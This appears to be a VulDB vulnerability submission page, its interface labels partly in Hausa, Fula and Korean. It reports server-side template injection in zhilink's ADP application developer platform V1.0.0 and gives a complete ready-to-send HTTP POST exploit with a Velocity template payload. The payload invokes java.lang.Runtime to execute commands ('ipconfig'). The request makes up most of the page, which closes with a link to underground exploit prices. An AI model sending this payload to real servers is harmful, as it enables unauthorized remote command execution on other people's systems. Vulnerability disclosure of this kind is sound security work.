Súbít #581275: 智互联(深圳)科技有限公司 ADP应用开发者平台 zhlink V1.0.0 Command Injectionbayani

Kura	智互联(深圳)科技有限公司 ADP应用开发者平台 zhlink V1.0.0 Command Injection
Gaskiya	漏洞地址：http://x.x.x.x:8082/adpweb/a?login 存在SSTI命令执行漏洞，通过此漏洞可以在服务器上执行任意命令，使用如下POC测试： POC: POST /adpweb/a/ica/api/service/rfa/testService HTTP/1.1 Host: x.x.x.x:8082 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 2386 Origin: http://x.x.x.x:8082 Connection: close Referer: http://x.x.x.x:8082/adpweb/a/rfa/rfaService/form?id=1 Cookie: zhilink.session.id=4f399847d4cb4b7abfc7105129d1e60f; JSESSIONID=F42393DC9C0F181B8D24D509047264EE; Hm_lvt_82116c626a8d504a5c0675073362ef6f=1705997682,1707016657; lang=zh_CN; Hm_lpvt_82116c626a8d504a5c0675073362ef6f=1707016661 {"serviceParams":"{\n\t\"std_data\": {\n\t\t\"parameter\": {\n\t\t\t\"ent\": \"99\",\n\t\t\t\"site\": \"SP2\",\n\t\t \"lang\": \"zh_cn\",\n\t\t\t\"ip\": \"x.x.x.x \",\n \"acct\":\"tiptop\",\n\t\t\t\"timestamp\": \"3527360109224935C:F9:DD:40:AE:085cf9dd40ae089096B006170920141521\",\n\t\t\t\"serviceProd\": \"T100\",\n\t\t\t\"serviceIp\": \"x.x.x.x \",\n\t\t\t\"docNo\": \"35A-180712000000007\",\n \"docType\":\"PURCHASE_ORDER\" ,\n\t\t\t\"fileType\": \"1\",\n \"originalFileName\": \"0010000254\",\n \"fileName\": \"端口\",\n \"version\": \"1\" \n\t\t}\n\t}\n}","responeTemplate":"#set($x='') #set($rt=$x.class.forName('java.lang.Runtime')) #set($chr=$x.class.forName('java.lang.Character')) #set($str=$x.class.forName('java.lang.String')) #set($ex=$rt.getRuntime().exec('ipconfig')) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end", "url":"","paramsResolve":"#set($parameter= $bodyMap.std_data.parameter)\n{\n\t\"datakey\": {\n\t\t\"CompanyId\": \"$parameter.site\",\n\t\t\"EntId\": \"$parameter.ent\"\n\t},\n\t\"host\": {\n\t\t\"appmodule\": \"B006\",\n\t\t\"prod\": \"APP\",\n\t\t\"lang\": \"$parameter.lang\",\n\t\t\"acct\": \"dcms\",\n\t\t\"ip\": \"$parameter.ip\",\n\t\t\"timestamp\": \"$parameter.timestamp\"\n\t},\n\t\"type\": \"sync\",\n\t\"key\": \"D402A32BCAE986232EB52A36933A4B9B\",\n\t\"service\": {\n\t\t\"name\": \"srm.files.downloadRequest\",\n\t\t\"id\": \"topprod\",\n\t\t\"prod\": \"$parameter.serviceProd\",\n\t\t\"ip\": \"$parameter.serviceIp\"\n\t},\n\t\"payload\": {\n\t\t\"std_data\": {\n\t\t\t\"parameter\": {\n \"docNo\": \"$parameter.docNo\",\n \"docType\": \"PURCHASE_ORDER\",\n \"fileType\":\"$parameter.fileType\" ,\n \"originalFileName\":\"$parameter.originalFileName\",\n \"fileName\":\"$parameter.fileName\",\n \"version\":\"$parameter.version\"\n\t\t\t}\n\t\t}\n\t}\n}","serviceName":"附件下载","serviceCode":"filesCreate","contentType":"json","urlId":"E10","method":"post","headers":"{\n \"Content-Type\":\"text/plain; charset=utf-8\"\n}"}
Manga	⚠️ http://x.x.x.x:8082/adpweb/a/login
Màdùmga	Id3al (UID 85503)
Furta	05/20/2025 02:47 (9 Wurɗi 전)
Gargajiya	05/29/2025 10:34 (9 days later)
Halitta	Shingilam
VulDB gite	310495 [zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 testService kura hakki ndiyam]
Nganji	20

◂ Gurɗo Gumti Gada ▸

Interested in the pricing of exploits?

See the underground prices here!